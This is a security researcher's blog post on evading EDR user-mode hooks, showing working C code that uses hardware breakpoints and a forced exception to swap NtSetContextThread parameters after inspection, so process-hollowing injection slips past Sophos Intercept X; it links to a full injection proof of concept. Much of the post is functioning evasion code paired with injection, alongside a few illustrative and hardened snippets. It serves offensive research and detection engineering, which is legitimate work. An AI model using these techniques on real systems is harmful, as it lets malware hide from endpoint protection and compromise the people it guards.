Silly EDR Bypasses and Where To Find Them

Recently I was testing an EDR’s ability to detect indirect syscalls, and I had an idea for an unusual bypass.
If you’re not already familiar with direct and indirect syscalls, I recommend reading this article first.

One of the drawbacks of direct and indirect syscalls is that it’s clear from the callstack that you bypassed the EDR’s user mode hook.
Below are some example callstacks from direct, indirect, and regular calls.

The callstack of a direct syscall.

The callstack of an indirect syscall.

The callstack of a regular hooked Nt function call.

As you can see from the last image, when a call is made through a hooked function, the return address for the EDR’s hook appears in the callstack (in my case this is hmpalert).
It’s an interesting dilemma: we don’t want to call the hooked function because that could trigger a detection, but if we bypass the hook entirely, that could trigger a detection too.

That’s when I had somewhat of a funny idea. What if I do call the hooked function, but do it in such a way that the EDR isn’t able to properly inspect the call parameters?
Straight off the bat, I had a couple of ideas.

TOCTOU

Time-of-check to time-of-use, or TOCTOU for short, is a technique often used in software exploitation.
The vulnerability arises when a security check is performed on an object, but nothing prevents that object from being modified between the time it’s checked and the time it’s used.

Let’s take the following code as an example:

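#include <windows.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

BOOL CopyData(char *src_buffer, uint32_t *src_size) {
  static char dest_buffer[1024];

  // time-of-check: *src_size is read here...
  if (*src_size >= 1024) {
    printf("error, buffer overflow!\n");
    return FALSE;
  }

  // time-of-use: ...and read again here, possibly with a different value
  memcpy(dest_buffer, src_buffer, *src_size);
  return TRUE;
}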

In the above, src_size is a pointer to an integer.
The function fails if the specified size is too big for the destination buffer.
Since src_size is a pointer, the program passes the address of the variable to the function instead of its value.
During the function’s execution, it’s entirely possible for the program to change the value pointed to by src_size.

If the attacker manages to perfectly time changing the value of src_size so that it occurs after if(*src_size >= 1024), but before the memcpy() call, they can still trigger a buffer overflow.
The value only needs to be less than 1024 until after the if statement is complete, then it can be set to a value larger than dest_buffer.

Note: the above example is highly oversimplified, and in the real world the compiler would likely optimize this code to only read the value of *src_size once.
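For contrast, a common way to close this kind of window is to read the shared value exactly once and use that local copy for both the check and the copy. The following is a minimal sketch of that idea, not code from the PoC; CopyDataSnapshot and DEST_SIZE are hypothetical names, and volatile is used only to make the single read explicit.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>
#include <string.h>

#define DEST_SIZE 1024

char dest_buffer[DEST_SIZE];

// Hypothetical hardened variant of CopyData: the size is read once, so the
// value that gets checked is the same value that gets used.
bool CopyDataSnapshot(const char *src_buffer, const volatile uint32_t *src_size) {
    assert(src_buffer != NULL && src_size != NULL);

    uint32_t size = *src_size;   // single read of the caller-controlled value

    if (size >= DEST_SIZE) {
        return false;            // rejected before dest_buffer is touched
    }

    memcpy(dest_buffer, src_buffer, size);
    return true;
}
```

Changing *src_size after the snapshot has no effect on the copy, which is exactly the property the EDR’s hook would need in order to resist the parameter swapping described next.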

My initial idea was to use a similar race condition against the EDR’s hook.
Call a hooked function with benign parameters, then quickly swap them out with malicious ones mid-call.
If we can time the change to occur after the EDR has finished inspecting the parameters, but before the syscall instruction, we can bypass the hook without actually bypassing it.

Whilst trying to figure out if there was a way I could avoid modifying the parameters too soon and triggering a detection event, I had another, better, idea.

Idea 2: Hardware Breakpoints

This idea was even simpler.
Pick an ntdll function I want to call that’s hooked by the EDR, then place a hardware breakpoint on the syscall instruction.
Hardware breakpoints allow us to tell the CPU to trigger an exception whenever a certain address is read, written, or executed.
So, by placing an execute breakpoint on the syscall instruction we’ll be able to intercept execution after the EDR has done its checks, but before the system call occurs.
This basically allows us to hook the EDR’s hook and turn any legitimate call into a custom syscall.

What we’ll be able to do is call a hooked function with benign parameters that won’t trigger a detection, then swap out the parameters with malicious ones after the EDR has already inspected the call.
We can even, if we want, change the system call number to invoke a different syscall than the one the EDR thinks we’re making.
The hardware breakpoint will be triggered right after the EDR has inspected our fake parameters, but before the syscall instruction transitions to kernel mode.

When the kernel returns to user mode, it’ll return to the instruction directly after the syscall, which is where we can place a second breakpoint.
The second breakpoint handler can then change the parameters back to prevent the changes being caught by any post-call inspection the EDR might do.
In many cases the EDR won’t bother with post-call inspection if the call failed, so we could also just change the EAX register to something like STATUS_NOT_FOUND, STATUS_INVALID_PARAMETER, or in homage to the TDSS rootkit: STATUS_TOO_MANY_SECRETS.

An example of code flow from a hooked NtWriteFile function.

The call flow will go something like this:

  1. Call the hooked Nt function with benign parameters
  2. The EDR inspects the benign parameters
  3. The EDR passes control back to the hooked Nt function to perform the syscall
  4. Our 1st breakpoint is triggered and we replace the parameters with malicious ones
  5. We continue execution so the syscall is triggered
  6. The kernel uses our real parameters, then returns to the Nt function
  7. Our 2nd breakpoint is triggered and we change the parameters back
  8. The EDR performs any post-call inspection and only sees benign parameters
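
The ordering of these steps can be modelled with a toy simulation. Nothing below touches real hooks, breakpoints, or syscalls; every name is hypothetical, and plain function calls stand in for the EDR, the kernel, and the two breakpoint handlers. It only illustrates why both inspections see benign data while the "kernel" sees the real parameters.

```c
#include <assert.h>
#include <stdbool.h>
#include <string.h>

// Toy model only: a single string stands in for the call parameters.
typedef struct { const char *arg; } call_params;

const char *kernel_saw = NULL;   // what the simulated kernel received
bool edr_flagged = false;        // set if the simulated EDR sees "malicious"

void edr_inspect(const call_params *p) {
    if (strcmp(p->arg, "malicious") == 0) edr_flagged = true;
}

void simulated_kernel(const call_params *p) { kernel_saw = p->arg; }

// Stand-ins for the two breakpoint handlers (steps 4 and 7).
void on_syscall_breakpoint(call_params *p) { p->arg = "malicious"; }
void on_return_breakpoint(call_params *p)  { p->arg = "benign"; }

// Steps 2-8 of the flow, in order.
void hooked_nt_function(call_params *p) {
    edr_inspect(p);              // steps 2-3: pre-call inspection
    on_syscall_breakpoint(p);    // step 4: swap in the real parameters
    simulated_kernel(p);         // steps 5-6: the "syscall" runs
    on_return_breakpoint(p);     // step 7: swap the fake parameters back
    edr_inspect(p);              // step 8: post-call inspection
}
```

Calling hooked_nt_function() with a benign argument leaves edr_flagged false even though kernel_saw ends up pointing at the swapped-in value.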

Ideally, the best targets are functions that take their parameters in CPU registers or via memory pointers.
If we start modifying stack variables, this could show up during callstack unwinding.

Finding A Suitable Target

In order to test my idea, I had to come up with a function call that would immediately trigger a detection event.
This actually proved a lot harder than I thought it would be.
Many operations that I was sure would trigger a detection didn’t.
In the end, I settled for using my old process injection code.

The code works somewhat like process hollowing.
It creates a new process in a suspended state, injects itself into the suspended process, then uses SetThreadContext() to change the entrypoint of the main thread to the entrypoint of the malicious code.
The target I chose was Sophos Intercept X, because it advertises detection of process hollowing attacks.

If we reverse engineer the user mode hook, we can see exactly how process hollowing is detected.

A snippet of the EDR’s NtSetContextThread hook handler.

Whenever a new thread is created, its instruction pointer is set to RtlUserThreadStart().
The first parameter of RtlUserThreadStart() is the thread’s entrypoint, which will be called after the function has finished initializing the new thread.
In a brand-new process there is only one thread, the main thread, which is responsible for calling the executable’s entrypoint.

During process hollowing, the executable’s code is unmapped and replaced with malicious code.
Since it’s unlikely the old and new code will have the exact same entrypoint address, it’s usually necessary to change the thread’s start address.
By changing the first parameter of RtlUserThreadStart() (the RCX register), we change the entrypoint of the thread, and therefore the entrypoint of the process.

Sophos’ detection simply checks if the code is trying to use NtSetContextThread() to change the RCX register of a new thread, which is suspicious behavior.
Since we can specify whatever entrypoint we want when creating a new thread, it doesn’t make sense to change it post-creation.
The only reason to do this is if the thread was created by something else, say, the PE Loader.

Bypassing The Check With Hardware Breakpoints

There are actually quite a few ways I can think of to bypass this check, but I’m only interested in experimenting with CPU exceptions.
For our first example, we’re simply going to set a breakpoint on the syscall and retn instructions of NtSetContextThread().

Below is some example code I wrote to find these instructions.

// find the address of the syscall and retn instructions within an Nt* function
BOOL FindSyscallInstruction(LPVOID nt_func_addr, LPVOID* syscall_addr, LPVOID* syscall_ret_addr) {
    BYTE* ptr = (BYTE*)nt_func_addr;

    // clear the outputs so the "not found" check below is reliable
    *syscall_addr = NULL;
    *syscall_ret_addr = NULL;

    // iterate through the native function stub to find the syscall instruction
    for (int i = 0; i < 1024; i++) {

        // check for syscall opcode (0F 05)
        if (ptr[i] == 0x0F && ptr[i + 1] == 0x05) {
            printf("Found syscall opcode at %llx\n", (DWORD64)&ptr[i]);
            *syscall_addr = (LPVOID)&ptr[i];
            *syscall_ret_addr = (LPVOID)&ptr[i + 2];
            break;
        }
    }

    // make sure we found the syscall instruction
    if (!*syscall_addr) {
        printf("Error: syscall instruction not found\n");
        return FALSE;
    }

    // make sure the instruction after syscall is retn
    if (**(BYTE**)syscall_ret_addr != 0xc3) {
        printf("Error: syscall instruction not followed by retn\n");
        return FALSE;
    }

    return TRUE;
}
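
To make the byte pattern concrete, here is a portable sketch of the same scan run against a static buffer instead of live ntdll memory. The example bytes follow the stub layout commonly seen on recent x64 Windows builds, which is an assumption rather than something the PoC depends on; the syscall number 0x1234 is a placeholder, and find_syscall_ret is a hypothetical helper name.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

// Returns the offset of the first `syscall; ret` sequence (0F 05 C3), or -1.
// Unlike the scan above, this never reads past the supplied length.
long find_syscall_ret(const uint8_t *code, size_t len) {
    assert(code != NULL);
    for (size_t i = 0; i + 2 < len; i++) {
        if (code[i] == 0x0F && code[i + 1] == 0x05 && code[i + 2] == 0xC3) {
            return (long)i;
        }
    }
    return -1;
}

// Bytes laid out like a typical unhooked stub (assumed layout, fake number).
const uint8_t example_stub[] = {
    0x4C, 0x8B, 0xD1,                               // mov r10, rcx
    0xB8, 0x34, 0x12, 0x00, 0x00,                   // mov eax, 0x1234
    0xF6, 0x04, 0x25, 0x08, 0x03, 0xFE, 0x7F, 0x01, // test byte ptr [0x7FFE0308], 1
    0x75, 0x03,                                     // jne to the int 2e path
    0x0F, 0x05,                                     // syscall
    0xC3                                            // ret
};
```

With this layout the syscall instruction sits at offset 18 and the ret at offset 20, which are the two addresses the breakpoints would be placed on.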

Unfortunately, the debug registers are privileged registers, which means we can’t set them directly from user mode.
In order to set up a hardware breakpoint, we need to use NtSetContextThread(), which is a little ironic.
We’ll basically be using NtSetContextThread to bypass the hook on NtSetContextThread.

To set up our hardware breakpoints we’ll need to set DR0 and DR1 to the addresses we want to break on, then DR7 tells the CPU what kind of breakpoints we want.

CONTEXT thread_context = { 0 };
thread_context.ContextFlags = CONTEXT_FULL;

// get the current thread context (note, this must be a suspended thread)
GetThreadContext(thread_handle, &thread_context);

dr7_t dr7 = { 0 };

dr7.dr0_local = 1; // enable DR0 (type bits left at 0 = execute breakpoint)
dr7.dr1_local = 1; // enable DR1 (type bits left at 0 = execute breakpoint)

// CONTEXT_ALL includes the debug registers
thread_context.ContextFlags = CONTEXT_ALL;

thread_context.Dr0 = (DWORD64)syscall_addr;     // set DR0 to break on syscall address
thread_context.Dr1 = (DWORD64)syscall_ret_addr; // set DR1 to break on syscall ret address
thread_context.Dr7 = *(DWORD*)&dr7;

// use SetThreadContext to update the debug registers
SetThreadContext(thread_handle, &thread_context);
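
The dr7_t type used above is not shown in this post, so as a rough sketch of what those two fields amount to, here is the equivalent bit arithmetic. dr7_enable_exec is a hypothetical helper; the bit positions follow the x86 debug register layout, where the local-enable bit for slot n is bit 2n and the type/length fields for slot n occupy bits 16+4n to 19+4n.

```c
#include <assert.h>
#include <stdint.h>

// Returns dr7 with slot 0..3 armed as a local instruction-execution
// breakpoint. Both the R/W and LEN fields must be 00 for execute breaks.
uint32_t dr7_enable_exec(uint32_t dr7, unsigned slot) {
    assert(slot < 4);
    dr7 |= 1u << (slot * 2);              // set Ln (local enable)
    dr7 &= ~(0xFu << (16 + slot * 4));    // clear R/Wn and LENn
    return dr7;
}
```

Arming slots 0 and 1 starting from zero yields 0x5, which should match what the bitfield version writes into Dr7.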

Inside the breakpoint handler, we’ll just change the RCX and RDX registers, which contain argument 1 and argument 2 of NtSetContextThread().
Prior to the call we can store the real values in a global variable, call NtSetContextThread with some fake values, then have our exception handler replace the fake values with the real ones.

Since the system call stub moves the first parameter from RCX into R10, we’ll set both just to be safe.

LONG WINAPI BreakpointHandler(PEXCEPTION_POINTERS e)
{
	// hardware breakpoints trigger a single step exception
	if (e->ExceptionRecord->ExceptionCode == STATUS_SINGLE_STEP) {
		// this exception was caused by DR0 (syscall breakpoint)
		if (e->ContextRecord->Dr6 & 0x1) {
			// replace the fake parameters with the real ones
			e->ContextRecord->Rcx = (DWORD64)g_thread_handle;
			e->ContextRecord->R10 = (DWORD64)g_thread_handle;
			e->ContextRecord->Rdx = (DWORD64)g_thread_context;
		}

		// this exception was caused by DR1 (syscall ret breakpoint)
		if (e->ContextRecord->Dr6 & 0x2) {
			// set the parameters back to fake ones
			// since x64 uses registers for the first 4 parameters, we don't need to do anything here
			// for calls with more than 4 parameters, we'd need to modify the stack
		}
	}

	e->ContextRecord->EFlags |= (1 << 16); // set the ResumeFlag to continue execution

	return EXCEPTION_CONTINUE_EXECUTION;
}

We can only read/write the context of a suspended thread, so we’ll just create a new suspended thread to call NtSetContextThread().
We’ll use NtSetContextThread(NULL, NULL) for our fake parameters.

DWORD WINAPI SetThreadContextThread(LPVOID param) {
    NtSetContextThread(NULL, NULL);
    return 0;
}

// calling our special NtSetContextThread
SetUnhandledExceptionFilter(BreakpointHandler);
HANDLE new_thread = CreateThread(NULL, 0, SetThreadContextThread, NULL, CREATE_SUSPENDED, NULL);
SetSyscallBreakpoints((LPVOID)NtSetContextThread, new_thread);
ResumeThread(new_thread);

The Result

First, let’s see what happens when we just call NtSetContextThread() normally.

Now, again, but with our special breakpoint sauce:

Success! The code was able to inject itself into notepad and display a message box.

But, I actually want to go a step further. Having to call NtSetContextThread to set up our hardware breakpoints isn’t great.
The EDR could use its NtSetContextThread hook to see if we’re trying to set breakpoints that’d interfere with the EDR.
So, what about regular old exceptions?

Idea 3: Intentional Exception

Instead of hardware breakpoints, we’re going to try to cause a CPU exception.
Regular exceptions can be handled in the exact same way as breakpoint exceptions, but we don’t need to call NtSetContextThread() to set them up.

We already know the EDR inspects the context structure whenever we call NtSetContextThread(), so let’s use that to our advantage.
Most software checks if an address is NULL before trying to read it, but what if it’s neither NULL nor a valid address?
What happens if we set the context address to 0x1337?

Let’s try the following:

HANDLE thread_handle = CreateThread(NULL, 0, test_thread, NULL, CREATE_SUSPENDED, 0);
SetThreadContext(thread_handle, (CONTEXT*)0x1337);

Then we run it and…

Whoops, the EDR’s hook tried to read the invalid memory and crashed the process.

Now we have an easy way of triggering an exception without any hardware breakpoints.
The tricky part is that the exception occurs inside the EDR’s handler, not directly before the syscall, so it’s much harder to replace the fake parameters with the real ones.
We also need to properly handle the exception so the process won’t crash.

From a combination of the crashdump and our earlier disassembly, we already know the EDR is trying to read the context->Rcx field into the RDX register.

The exception is triggered on line 1 of this pseudocode.

We could use a disassembler to make a more generic bypass, but since this is just a PoC, we’ll hardcode it to this specific EDR version.
The instruction that triggers the exception is mov rdx, qword [rbx+0x80], which means the context pointer (0x1337) is in RBX.
We’ll simply set RBX to point to an empty CONTEXT structure, which will result in thread_context->Rcx being zero, and the EDR not triggering a detection.

For the syscall to succeed now that the EDR’s check has been bypassed, we still need to fix the invalid context pointer.
The function where the exception occurs is only responsible for inspecting our context structure and doesn’t initiate the syscall.
However, the context pointer that is passed to the syscall is saved somewhere on the stack by the EDR.
The lazy fix is to just walk the stack and replace every instance of 0x1337 with the address of our real context structure.

// exception handler for forced exception
LONG WINAPI ExceptionHandler(PEXCEPTION_POINTERS e)
{
	static CONTEXT fake_context = { 0 };

	printf("Exception handler triggered at address: 0x%llx\n", (DWORD64)e->ExceptionRecord->ExceptionAddress);
	
	DWORD64* stack_ptr = (DWORD64*)e->ContextRecord->Rsp;
	
	// iterate first 300 stack items, looking for our fake address
	for (int i = 0; i < 300; i++) {
		if (*stack_ptr == 0x1337) {
			// replace the fake address with the real one
			*stack_ptr = (DWORD64)g_thread_context;

			printf("Fixed stack value at RSP+(0x8*0x%x) (0x%llx): 0x%llx\n", 
				   i, (DWORD64)stack_ptr, (DWORD64)*stack_ptr);
		}
		stack_ptr++;
	}
	
	// The pointer to our invalid address is in RBX, so replace it with an empty structure
	// the RCX member of the context structure being NULL will cause the EDR to skip its check
	e->ContextRecord->Rbx = (DWORD64)&fake_context;

	return EXCEPTION_CONTINUE_EXECUTION;
}
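
The stack walk in the handler is a blind search and replace, which can be shown in isolation on an ordinary array. This is a sketch with hypothetical names (patch_marker and its parameters), not part of the PoC.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

// Replaces every 64-bit slot equal to `marker` with `real` and returns
// how many slots were patched. Only exact matches are touched.
size_t patch_marker(uint64_t *slots, size_t count, uint64_t marker, uint64_t real) {
    assert(slots != NULL);
    size_t patched = 0;
    for (size_t i = 0; i < count; i++) {
        if (slots[i] == marker) {
            slots[i] = real;
            patched++;
        }
    }
    return patched;
}
```

Because the scan cannot tell the saved context pointer apart from any unrelated slot that happens to hold the same value, a more distinctive marker than 0x1337 would lower the chance of corrupting something else on the stack.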

Now we just run the code and see what happens…

Nice! It works.

So there we have it, two ways to bypass EDR hooks without bypassing EDR hooks.
Though, I’m not sure how practical or easy it would be to turn the forced exception method into a generic EDR bypass.
Since we can’t easily change pointers back after the syscall, and it only works with calls where the EDR reads pointers, it’s fairly limited.
The first method is far more generic, but probably also far easier to write detections for.

It’s possible we could combine both methods, since exception handlers allow us to modify a thread’s context without the use of NtSetContextThread().
We could force an exception, then use the exception handler to set up our hardware breakpoints.

But anyway, I’m going to leave it there. This was just a fun little weekend side project I figured I’d post. Hopefully someone will find this information useful.

I’ve uploaded the full process injection proof of concept to my GitHub here: github.com/MalwareTech/EDRception
